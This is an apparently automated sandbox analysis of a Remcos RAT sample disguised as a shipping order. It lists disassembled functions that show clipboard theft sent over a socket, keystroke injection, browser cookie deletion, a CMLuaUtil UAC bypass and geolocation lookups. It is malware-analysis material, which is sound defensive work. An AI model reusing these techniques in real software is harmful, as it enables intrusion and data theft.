                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3864826663-0
                                                      • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                      • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                      • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                      • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                      Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendInput.USER32 ref: 00418B08
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                        • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InputSend$Virtual
                                                      • String ID:
                                                      • API String ID: 1167301434-0
                                                      • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                      • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                      • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                      • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                      Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 00415A46
                                                      • EmptyClipboard.USER32 ref: 00415A54
                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                      • OpenClipboard.USER32 ref: 00415A61
                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                      • CloseClipboard.USER32 ref: 00415A89
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                      • String ID:
                                                      • API String ID: 2172192267-0
                                                      • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                      • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                      • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                      • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                      Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00447EBC
                                                      • _free.LIBCMT ref: 00447EE0
                                                      • _free.LIBCMT ref: 00448067
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                      • _free.LIBCMT ref: 00448233
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                      • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                      • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                      • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                      Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                      • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                      • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                      • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                      Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • _free.LIBCMT ref: 00444086
                                                      • _free.LIBCMT ref: 0044409D
                                                      • _free.LIBCMT ref: 004440BC
                                                      • _free.LIBCMT ref: 004440D7
                                                      • _free.LIBCMT ref: 004440EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID: J7D
                                                      • API String ID: 3033488037-1677391033
                                                      • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                      • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                      • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                      • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                      Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                      • __fassign.LIBCMT ref: 0044A180
                                                      • __fassign.LIBCMT ref: 0044A19B
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                      • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                      • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                      • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                      • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                      • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                      Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: HE$HE
                                                      • API String ID: 269201875-1978648262
                                                      • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                      • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                      • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                      • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                      Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                        • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                        • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                      • String ID: TUFTUF$>G$DG$DG
                                                      • API String ID: 3114080316-344394840
                                                      • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                      • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                      • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                      • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                      Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                      • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                      • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                      • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                      Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                      • API String ID: 1133728706-4073444585
                                                      • Opcode ID: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                      • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                      • Opcode Fuzzy Hash: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                      • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                      Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                      • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                      • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                      • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                      Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                      • int.LIBCPMT ref: 0040FC0F
                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                      • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                      • String ID: P[G
                                                      • API String ID: 2536120697-571123470
                                                      • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                      • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                      • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                      • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                      Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                      Strings
                                                      • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                      • String ID: http://geoplugin.net/json.gp
                                                      • API String ID: 3121278467-91888290
                                                      • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                      • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                      • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                      • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                      Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                      • _free.LIBCMT ref: 0044FD29
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 0044FD34
                                                      • _free.LIBCMT ref: 0044FD3F
                                                      • _free.LIBCMT ref: 0044FD93
                                                      • _free.LIBCMT ref: 0044FD9E
                                                      • _free.LIBCMT ref: 0044FDA9
                                                      • _free.LIBCMT ref: 0044FDB4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                      • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                      • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                      • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                      Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe), ref: 00406835
                                                        • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                        • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                      • CoUninitialize.OLE32 ref: 0040688E
                                                      Strings
                                                      • [+] ShellExec success, xrefs: 00406873
                                                      • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                                      • [+] before ShellExec, xrefs: 00406856
                                                      • C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 00406815, 00406818, 0040686A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                      • API String ID: 3851391207-2693966283
                                                      • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                      • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                      • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                      • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                      Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                      • int.LIBCPMT ref: 0040FEF2
                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                      • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                      • String ID: H]G
                                                      • API String ID: 2536120697-1717957184
                                                      • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                      • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                      • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                      • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                      Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                      • GetLastError.KERNEL32 ref: 0040B2EE
                                                      Strings
                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                      • UserProfile, xrefs: 0040B2B4
                                                      • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                      • [Chrome Cookies not found], xrefs: 0040B308
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                      • API String ID: 2018770650-304995407
                                                      • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                      • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                      • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                      • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                      Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Console$AllocOutputShowWindow
                                                      • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                      • API String ID: 2425139147-2527699604
                                                      • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                      • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
